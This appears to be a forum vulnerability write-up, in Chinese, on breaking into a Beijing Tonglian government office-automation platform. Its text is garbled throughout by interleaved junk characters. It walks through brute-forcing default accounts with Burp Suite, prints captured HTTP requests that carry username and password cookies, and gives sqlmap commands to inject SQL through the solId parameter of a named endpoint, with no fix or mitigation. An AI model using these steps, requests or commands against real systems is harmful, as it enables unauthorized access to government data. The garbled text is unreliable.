1 w# J$ [8 X. c& a
% U( F4 I/ H# s4 n 6 Z8 h! B, P# i/ U0 \ @
! j% C# W# x- W3 K- e
平台简介:8 H5 }4 v- s. ?
7 K# ~( J7 @* M
2 q- ` h5 R. R9 k / g# p3 y' p" H, W' X
9 e) l% c$ i# Y Y7 ^. J- Q
; }# Q F& ]+ W' N 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
/ U+ |; a' f5 X; m4 i同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 6 u2 L8 E% Y+ e4 i; j
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 n! o! h# G9 X: o% v/ A
( P3 ] m0 a, @0 c0 [) |3 D* m. A
) |; ?, }6 Y4 n& o+ r& i+ A& n
" _& d0 Y* e2 M0 i* }1 ^; Q: o
$ E3 V8 n0 s( j8 R3 `
) j' b% g) l5 } u! _' S4 o y 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:. \; ^2 L% J; g _, ?, M( K
4 L( P8 o. \, C% r
! R9 [! G' G' U
$ U# A! n( X; S
' v" |- J- W/ [$ L; `0 q
f8 J" @- A+ J/ k1 ]/ ]& [8 @ http://1.1.1.1:7197/cap-aco/#(案例2-)4 }. F! S1 u8 y/ e1 v6 m
8 s! X. Y) e, V( q& E! g
% l0 ~1 ^* G, q w http://www.XXOO.com (案例1-官网网站)
6 p7 _ l, E7 K N - N: Z" ~7 @+ b0 y; Y
) q. y% m' Q9 q: d( O! a( b
9 V7 f8 E7 \& C3 P9 N
1 h) R- m d& L( \4 G' d
. G+ s2 x6 `! q* [3 d3 X 漏洞详情:
* t- q! ^7 ?% Q* U, F$ \) {4 | 6 j- T. n0 q# ?4 T6 y
1 A; P' D! h% o: }, G 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
3 m6 q& I: [2 c8 W- J ( r, m% ^% [! S# P7 ~
. l5 c0 g0 K) j& _
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
. B3 [* N3 o& j3 X2 _7 `
$ V8 g1 B% {1 i) P; x& z* x/ x% J! R; D6 V4 ]2 o0 Q5 {( U
4 x! ]! l) {) V1 w * I# J9 O- ^4 V1 Z* ?) g
) d8 c# T$ v, \9 X6 ?5 e6 O+ C) p
% u6 G$ m. h9 N
4 ^7 a# f8 N! B6 \6 w4 \
- \& p; ~1 [, R4 C+ | status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:2 T' _2 E$ t! [/ j5 U0 s* h
/ _. a2 H' v" f% z' i/ ]2 Y' l- \
" e/ O, ~ a) s% Q* \5 T9 P: N; b
1、案例1-官方网站4 g* W. O5 H* D: A" Z6 q
+ a; H) `% s5 J8 m, Z X/ c7 y
3 Q; h$ x; v6 s) T GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
+ Y8 r0 W) K$ _5 ~' m
- W3 X* Y0 A' Y" Y7 [1 J5 }+ p: k
0 K. z5 ~) Y- F9 C. [1 A n U1 x Host: www.XXOO.com4 H2 L' a: ^( ]+ S
' }& n/ j" c) H. n3 A" b, B! r
$ ^3 Q+ `& o" F% V7 M Proxy-Connection: Keep-Alive
3 y% s. K4 P, |: d% } 5 e7 I0 @- b6 D n
+ W: h# g5 ~% y Accept: application/json, text/javascript, */*; q=0.010 U' L6 _) K3 k/ I4 g9 F
. j% J- w! Q; o& c" p# a
1 ~, c1 ?. M- l+ r Accept-Language: zh-CN0 X7 f5 m- ~- b" j. w
j6 v! l5 `5 u/ P0 Q
3 v. m1 ^' X. T) T Content-Type: application/json
/ h) ?( u( S: G) T- }6 s$ }; P! O
# g) G2 u, V( @; f
7 B K1 m& `7 w3 j) N User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko; p% H/ b+ f: V' t
) y( |$ P' m0 v8 l8 F
% U! w! i2 W9 d1 a. N7 _: C& o$ ^
X-Requested-With: XMLHttpRequest
9 ~) Y- u" c3 }% f$ H- J k % Y9 x- z# Y( s$ s( m
7 F2 m5 Y8 O" `: N8 C6 [ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002- H# ^) c2 H& T8 e: S
+ ~8 a: S: _2 y, \" U* B' D/ r. M( @+ W: }) x- o& b8 E
Accept-Encoding: gzip, deflate, sdch e2 \/ B: R1 @
# J! E0 ?4 v- {. U K* b
; @7 x O$ \6 c2 ~' @* d
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e! i; d( M8 s' } Q
, y2 }1 j4 M+ i* ^: I+ n$ V2 ~! y
& ~' z$ F2 o4 B2 N# i 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
; J" ^# o B+ e6 [0 R! y* B$ ]! S- Y
d a* M( u( T/ m# Z
- v' T, G" b5 C4 Q& w$ ] 4 v. n( V2 }0 X) W& y
' G% H9 i. I' @# ^+ N3 Z. N0 J1 k% v- P/ D i8 U, {; q% C
% `# l6 Z( }7 s4 F! B/ \
" {# X( O7 T2 J
" [7 |" k/ c* @$ `7 `
" n/ s7 x* S! L, W" @* X
! t0 L/ d h0 V G+ @+ ]
' H6 Q1 t* h) C! t; n# f
5 e+ M0 h6 y$ i, t3 N
! {, }! L6 X; T: b; J. j2 ^& y" G3 x
$ G# X2 W9 J! l6 t7 L2 n2 P
- t, N. s i. s Y1 Y; l' T2 ^3 W' J F! q( y8 {& P* v# w# Q, a
2、案例2-某天河云平台 P- ?! s" G8 ?, @9 @; B( y* x: D( V
; l1 V7 _& E& G* S
7 J% p' \& g( L- g GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
( L- J/ z9 E# z1 h . Z2 h) F! V8 b$ @4 w
7 K% S' ~' ?! a w+ P8 B4 b- c
Host: 1.1.1.:71971 T) d1 B* H0 P* x: s
$ g5 Y1 V+ p. f1 ]/ t6 ?4 Q
7 O3 _0 Z; ?# v1 u4 b/ F
Accept: application/json, text/javascript, */*; q=0.01
/ h" g! e. @% x7 V8 ]5 N 0 ^2 { f. o/ m# z: P: w
0 o* Z3 u; M b0 O# k. k
X-Requested-With: XMLHttpRequest; \. }7 a; S& E+ r5 V6 j6 J. _
( H! A% O. q8 U2 P( @9 t9 m5 }1 |! Y& Y4 L) |
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.00 m o# C4 k' m0 q) |
+ o- {# @( e0 d
" k1 i; r. H8 V! A* G% L2 }/ j Content-Type: application/json: i! \+ }! |1 j( Y7 U
) L7 c2 K" f, T1 I! w( d: t; E0 `. _ f# Y- I
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
: J$ l6 ^: b% g+ F
5 B1 ]1 l1 P0 c' B
/ K: T6 t1 K! J5 F) Z Accept-Language: zh-CN,zh;q=0.8
9 x* c! z E" R, K* E1 K / a) M1 n# l' z6 x! Q2 L5 r
+ j8 x1 p0 e0 u( ^
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
M* {% A0 K9 {! Z. x
6 S( O5 Q8 s- p
3 M- j& w( p2 t" e, y Connection: close
7 m/ b4 s* J+ ?
( ?2 \% v3 e: S1 {: {5 w3 V! A; L$ ~5 G: C+ f! d! m# Y
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:7 s' E" d5 ~- Z+ [# l9 t+ F% y
0 y4 J6 C t8 q9 h+ i
2 Y a6 S g5 k+ G3 P: r8 h7 _ ) z* h {" }$ o* c$ p* a! @3 g
! t3 x6 }$ ^4 l( T
$ Z# \% ^/ r" |+ Y / R* p& g5 [7 ~0 j6 q: D0 R1 g
|